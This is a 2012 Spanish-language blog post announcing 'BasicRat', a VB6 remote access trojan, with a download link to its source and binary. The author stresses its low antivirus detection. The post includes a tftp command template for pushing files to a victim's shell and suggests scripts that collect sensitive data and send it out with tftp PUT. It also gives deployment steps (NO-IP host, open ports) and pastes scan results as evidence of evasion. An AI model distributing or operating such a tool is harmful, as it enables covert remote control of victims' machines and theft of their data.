BasicRat by HD_Breaker ~ HD_Breaker Seguridad Informatica

viernes, 27 de julio de 2012

BasicRat by HD_Breaker

5:15    No comments

Les Traigo una Herramienta Que Arme en estos Dias,
Es un Rat bien Basico, en VB6 no es multithread (no he tenido tiempo de modificarlo),
tampoco tiene incluido el Builder exe,
La Shell no responde a cd ni a comandos q requieran respuesta (luego del comando debera pasarse el comando 1 para obtener la respuesta)
El filemanager no esta incluido, preferi hacerlo funcionar con un servidor tftp (tftp -i "ip/host" GET "Archivo") para luego ejecutarlo desde la shell
(en esta parte se pueden armar varios scripts para obtener informacion sensible guardarla en un log y por medio de tftp PUT obtener el Contenido de estos)
No se Adhiere al Registro (esta funcion la pondre en unos dias cuando termine de Rendir, igual cualquiera de esta seccion sabra agregarle funciones a este proyecto)

El Fin de este RAT era mantener la simpleza para reducir la cantidad de AVs que detectan el Server
Todo Nacio a base de Un Proyecto para la Universidad, a esto le falta mucho desarrollo
pero la meta era realizar algo simple y poderoso con baja deteccion y en lenguaje VB6


Prometo Mejorarlo y Codearlo en Otro Lenguaje.

Adjunto Los Proyectos (Source y Binario)

http://www.filefactory.com/file/5rlj3lf28b63/n/BasicRat.rar

Test.exe esta sobre 127.0.0.1 para prueba local,
Para Hacerlo Funcional fuera del entorno local, cambien el ip por su NO-IP y abran los puertos 9669, 6666 y 9999
C:\Windows\System32 puede variar depende de la pc
pueden usar las variables de entorno para setear eso al momento de escribir los logs. (%SystemDrive%\System32\)

Todo Aquel que desee Modificarlo sientace libre de hacerlo.

Capturas:



Un escaneo Rapido Bajo NoVirusThank

File Info

Report date: 2012-07-27 09:57:10 (GMT 1)
File name: test-exe
File size: 28672 bytes
MD5 Hash: aa55baf750fef5167f0bb79cdc1000c0
SHA1 Hash: b8a248d1105ef47e1edd4872ace31b08da2973f0
Detection rate: 1 on 14 (7%)
Status: INFECTED 


Detections

Asquared -
Avast -
AVG -
Avira -
BitDefender - Gen:Trojan.Heur.bm0@fr!oGDJ
ClamAV -
Comodo -
DrWeb -
Fprot -
IkarusT3 -
Panda -
STOPZilla -
TrendMicro -
VBA32 -

Scan Date: 2012-07-27
File Name: Test.exe
File Size: 36864 bytes
MD5 Hash: aa55baf750fef5167f0bb79cdc1000c0
SHA1 Hash: b8a248d1105ef47e1edd4872ace31b08da2973f0
Status: INFECTED
Total Result: 7/37
AVG: Clean
Acavir: Clean
Avast 5: Clean
Avast: Clean
Avira: TR/Dropper.Gen
BitDefender: Clean
VirusBuster Internet Security: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
DrWeb: Clean
eTrust-Vet: Win32/VBNA.A!generic
F-PROT Antivirus: Clean
F-Secure Internet Security: Trojan.Generic.KDV.554434
G Data: Trojan.Generic.KDV.554434
IKARUS Security: Clean
Kaspersky Antivirus: Trojan-PSW.Win32.Ruftar.nwc
McAfee: Clean
MS Security Essentials: Clean
ESET NOD32: Clean
Norman: Clean
Norton: Clean
Panda Security: Clean
A-Squared Security: Clean
Quick Heal Antivirus: Clean
Rising Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Vexira Antivirus: Clean
Webroot Internet Security: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
AhnLab V3 Internet Security: Clean
Bullguard: virus: Trojan.Generic.KDV.554434
Imunitet: Trojan.Generic.KDV.554434
Vipre: Clean

0 comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)